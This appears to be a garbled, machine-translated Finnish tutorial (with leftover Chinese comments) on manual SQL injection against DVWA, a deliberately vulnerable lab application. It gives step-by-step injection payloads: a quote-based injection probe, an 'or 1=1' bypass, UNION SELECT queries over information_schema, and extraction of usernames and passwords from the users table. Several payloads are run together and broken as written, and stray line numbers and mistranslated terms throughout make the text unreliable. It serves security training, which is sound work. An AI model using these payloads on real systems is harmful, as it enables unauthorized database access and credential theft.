3.2 Kohdedrone (projektiympäristön käytön oppiminen)
vaikutus
Linux-virtuaalikonejärjestelmä Jotkin verkkosovellukset, joissa on tunnettuja haavoittuvuuksia, on asennettu tähän virtuaalikoneeseen oppimisen helpottamiseksi.
Kali sisältää satoja työkaluja, joita voidaan käyttää erilaisiin tietoturvatehtäviin, kuten penetraatiotestaukseen, tietoturvatutkimukseen
4. Manuaalinen ruiskutus
4.1 Ympäristön valmistelu
Kuvaus: Harjoittele manuaalista injektiota drone-verkkosovelluksen kautta vaihe:
Käynnistä kohdedrone OWASP
Pääset drooniin selaimen kautta
Vieraile OWASP-dvwa-projektissa
Kirjaudu sisään
Valitse sql-injektiosovellus
4.2 Etsi pistoskohta
Huomautus: Käytä pääasiassa yksittäisiä lainausmerkkejä ja erotusmerkkejä, pääasiassa yksittäisiä lainausmerkkejä periaate:
#后台程序sql语句select first_name,last_name from users where user_id ='$id';#输入单引号('),相当于将sql语句闭合,后面就可以使用附加其他逻辑条件了select first_name,last_name fro users where user_id =''';
1
2
3
4
4.3 Looginen TAI
4.4 Arvaa sarakkeiden lukumäärä
liiton toimesta
' unionselect1,2#
1
2. Loogisella TAI:lla
'or1=1#
1
4.5 Hanki tietokannat, taulukot ja sarakkeet
Hanki tietokannan nimi
' unionselect1,database()#
1
Hanki pöytä
' union select table_name,1 from information_schema.tables where table_schema='dvwa' #
1
Hae sarake
' union select column_name,1 from information_schema.columns where table_name='users' #
1
4.6 Hae tiedot
//1. 获取单个字段数据' union select user,1 from users#
//2. 获取两个字段
'unionselectuser,password from users#
1
2
3
4
5
4.7 concat-funktio
Toiminto: Liitä useita merkkijonoja yhdeksi merkkijonoksi Syntaksi: concat(str1, str2,…) Esimerkki:
Hanki user_id, user, salasana käyttäjätaulukosta ja näytä ne kahdessa sarakkeessa